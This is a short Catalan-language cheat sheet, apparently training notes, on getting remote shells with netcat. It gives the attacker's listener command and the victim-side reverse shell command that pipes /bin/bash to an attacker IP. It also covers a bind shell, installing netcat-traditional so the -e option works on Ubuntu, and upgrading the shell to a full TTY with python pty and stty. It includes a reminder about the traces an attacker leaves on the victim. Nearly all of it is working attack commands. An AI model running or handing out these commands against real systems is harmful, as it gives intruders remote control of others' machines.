Reverse shell amb NC #
Creació #
Al terminal de l'atacant creem un servei escoltant via nc
nc -lnvp port
Connexió des del client #
A la màquina víctima ens hi connectem
nc -e /bin/bash IPSERVER PORT
Si la instrucció anterior la fas amb Ubuntu no funcionarà. Hauries de desintal·lar nc i instal·lar netcat-traditional
de la següent manera
sudo apt-get install netcat-traditional
Després executem el següent i seleccionem l'opció /bin/nc.traditional
sudo update-alternatives --config nc
Consideracions #
Considera el que deixes a la màquina víctima. Deixaràs la IP del teu servidor?
Bind Shell #
Víctima #
Ara el procés és el contrari. Desde la víctima executem
nc -lvp PORT -e /bin/bash
Atacant #
I desde l'atacant
nc IP PORT
Upgrade de la shell #
Uograde 1 #
- Si la màquina té interprete de python
python3 -c 'import pty; pty.spawn("/bin/bash")'
Upgrade 2 #
- executar
script -qc /bin/bash /dev/null
- sortir amb ctrl-z
- en un consola propia consulta rows i columns
stty size
- escriure
stty raw -echo; fg
reset
xterm (RESPOSTA)
export TERM=xterm
export SHELL=bash
stty rows XX columns YY (on XX i YY són els resultats obtinguts a l'anterior consulta)